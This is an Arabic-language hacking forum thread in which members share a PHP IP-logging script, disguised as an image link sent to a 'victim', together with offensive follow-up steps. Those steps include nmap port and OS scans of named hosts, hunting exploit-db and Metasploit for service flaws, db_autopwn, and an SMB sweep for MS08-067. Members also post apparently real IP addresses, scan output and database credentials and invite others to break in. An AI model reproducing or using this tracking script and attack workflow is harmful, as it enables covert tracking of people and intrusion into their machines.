سحب ايبي الضحية بطريقة حصرية

ألسلام عليكم ورحمة الله تعالي وبركاته

حبيت أطرح سكريبت خفيف مبرمج بال php

طبعااا يمكنك العمل بالسكريبت هو رفعه علي اي مساحة وإعطاء الرابط للضحية وبعدها تفتح أنت الرابط رايح تجد الايبي علي شكل

مثال

وتنجح الطريقة مع facebook gmail yahoo

لأنه صعب شوي من مبتدأ سحب الايبي علي طول

السورس

<?php
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$img_number = imagecreate(400,95);
$backcolor = imagecolorallocate($img_number,10,102,153);
$textcolor = imagecolorallocate($img_number,255,255,255);

imagefill($img_number,0,0,$backcolor);
$number0 = " This is Your IP/Proxy";
$number1 = " IP: $_SERVER[HTTP_X_FORWARDED_FOR]";
$number2 = " Host/Proxy: $hostname";
$number4 = " _________________________________";

Imagestring($img_number,10,5,5,$number0,$textcolor);
Imagestring($img_number,10,5,25,$number1,$textcolor);
Imagestring($img_number,10,5,45,$number2,$textcolor);
Imagestring($img_number,10,5,50,$number4,$textcolor);
Imagestring($img_number,10,8,50,$number4,$textcolor);
Imagestring($img_number,10,5,10,$number4,$textcolor);
Imagestring($img_number,10,8,10,$number4,$textcolor);

header("Content-type: image/png");
imagepng($img_number);
$file=fopen("Name-here-to-protect-the-File.txt","a");
$file2 = "- IP joined - IP/Proxy: $_SERVER[HTTP_X_FORWARDED_FOR] - Host: $hostname - '
' ";
fwrite($file, $file2);
fclose($file);
?>

بس المشكلة موش فى إبي الضحية مليون طريقة موجدة من غير متبعة اي شئ المهم بتشركو شئ على الشبكة

محادثة ملفات صوت صورة …

بس المشكلة تعمل بي الإبي إه ؟.؟؟

طريقة حلوة ومضمونة لاظهار الابى بى الثابت للضحية لعشاق الميتا …
مشكور حبيبى

مم يوجد موقع يعمل نفس الشيء تواني احطه يرسل لك الايبي بالاميل وممكن تختار انت صورة لموقع متلا sec4ever لككي لا يشك عند دخول لوحة

طب لنفترض أنه عندك لابي تبعي

تقدر تعمل إه بالميتا ؟؟؟

بس حاجة تكون جربتها ونجحة معك ddd

مدخلتش الميتا ف الاجهزة بصراحة بس ف شروحات مشهورة ومجربة كتير وسهلة بتفحص الاى بى وبتشوف البورتات والثغرات وبتطبقها .

تطبق هاي الامرين
map -sT 41.214.249.119
امر معرفة البورتات المفتوحة واسم الخدمة والاصدار وتبت ب exploit-db عن تغرة للخدمة
nmap -O -v pbrotherhood.com
لمعرفة نوع النظام windows 7 او ubuntu fedora …
بعد معرفته موجود تغرات لكل الانظمة ابحت في metasploi gui
راح تجد تغرات لكل الانظمة :d
غامض هاكرز تم دعسه بهاي الطريقة شوف فديو الدعس بيوتوب

في برنامج nmap نسيت

ولله لو محربتش بإدك متصدقش إلى بتشوفو هههههههه

غامض مين هههههه

هو فيه حد بيسمي حالو غامض ddd

شكرا يرس على المعلومات :slight_smile:

السلام عليكم و رحمة الله تعالى و بركاته

بارك الله فيك على السكربت

لكن المتغير


$_SERVER['REMOTE_ADDR']

لا يجلب الايبي الحقيقي لعلمك

تفضل هذه الدالة


    public function getIP()
        {
            if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { 
            $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; 
           } 
           elseif(isset($_SERVER['HTTP_CLIENT_IP'])) { 
            $ip = $_SERVER['HTTP_CLIENT_IP']; 
       } 
       else { 
            $ip = $_SERVER['REMOTE_ADDR']; 
       } 
       
       $this->ip = $ip; // this line is a MUST 
       $this->ip = '41.250.181.227'; // this is an i.e of my actual IP address: remove this to get the real IP address


        }



</span>

ههههههه
شوف حمل سنايفر
http://www.nirsoft.net/utils/smsniff.zip
وشغله وادخل للاميل كل لي متصلين بالاميل
يكتب لك الاميل بتاعك تم لي متصل معك على البورت 184 بتاع المسنجر ويعطيك الايبي يعنيي كل لي معك بالاميل عرضة للدعس
بالميتا واستخدم اداة db-aurobon الاداة تجرب اكتر من تغرة على الضحية حتى تفتح لك جلسة مستربريتر او armitage
ولكن ادا كنت تستخد غير ميتيدل او adsl مراح تنجح التغرات زمال عمل اتضال vpn

هاهو الموقع شباب لي بدو الشرح
http://www.shivampatel.net/trace/
شرحه
http://www.mediafire.com/?m8qe96e2z2ut89e

انا استخدم الموقع جربو على نفسك الايبي الجقيقي يجيب لك متل لي يطلع لك هنا
http://www.ip-adress.com/

شباب شكراا لكم مش أنا مبرمج السكريبت فقط كان عندي من زمان طرحته

  • يا ريمون أنا مجرب الطريقة الاختراق بالايبي وخاصة عن طريق ثغرة الريموت ms07_08

طبعااا تخترق علي طول وما ننسي سكريبتات الميتاا مثال لقحص ايبي علي الشبكات ومعرفة ادا الانضمة تحنوي علي ثغرة الريموت

ms07

هيك الامر

nmap -sV 192.168.1.1/-255 -p 445 --scriptsmb-check-[b]vulns.nse

طبعااا إدا الثغرة موجودة بيعطيك النتيجة
[/b]

Host script results:
| smb-check-vulns:
| MS08-067: NOT VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: regsvc DoS: NOT VULNERABLE
| SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
| MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive)

السلام عليكم صح فطوركم المشكل مش في الايبي بس كيفية الاختراق

هاهو ايبي تبعي وجرب اخترق 41.107.9.16

بس فيه طريقة تقدر تخترق جهاز على حسب وش مركب من برامج

اهو لابي نتعي

My IP address is: 41.142.135.171

My IP Address Location: in Morocco
ISP of my IP: Maroc Telecom

جربو فيا

او إلى نجحت شرحوها لينا

ههههه نوع نظام جربت الفحص ب الاخ BrOx-Dz
عرفت فقط البورتات

Starting Nmap 5.51 ( http://nmap.org ) at 2011-08-07 02:15 Greenwich
لا زال الفحص يبحت ولا جديد D:

Starting Nmap 5.51 ( http://nmap.org ) at 2011-08-07 02:15 Greenwich

Nmap scan report for 41.142.135.171

Host is up (0.23s latency).

Not shown: 997 filtered ports

PORT STATE SERVICE

80/tcp open http

3306/tcp open mysql

8080/tcp open http-proxy

رايمون ليس لدي القدرة للاختراق من البورتات عندك فقط http and mysql
نشوف النظام
ubuntu مشكل

على فكرة بورتات كثير مفتوحة

لو عوز اركب اي برنامج مصاب انا تحت أمرك

وعلى فكرة النامب بيخرف

بورت 8080 شغال عليه iis 6 موش http-proxy :slight_smile:

http://41.142.135.171/phpMyAdmin/

Username: toor

Passwork: NO

هههههههههههههههههههههههههههه

بدل المعلومات للاسف كنت راح امسح لو اللوكال هوست كله ليتعلم وضع ايبيه خخخخ

اليوزير نايم root

البسورد 123654

موفقين يرجالة

ثانكس خويا جاقو على الفكرة الجميلة.

بالنسبة للأختراق بالميتا اعتقد اشهر شىء ناجح فيه هو الأختراق عن طريق البورت 445 و هذا كان ناجح بقوة في الناس الى

استعملوا الريلكس و بعض شبكات ال vpn .

و بالتوفيق .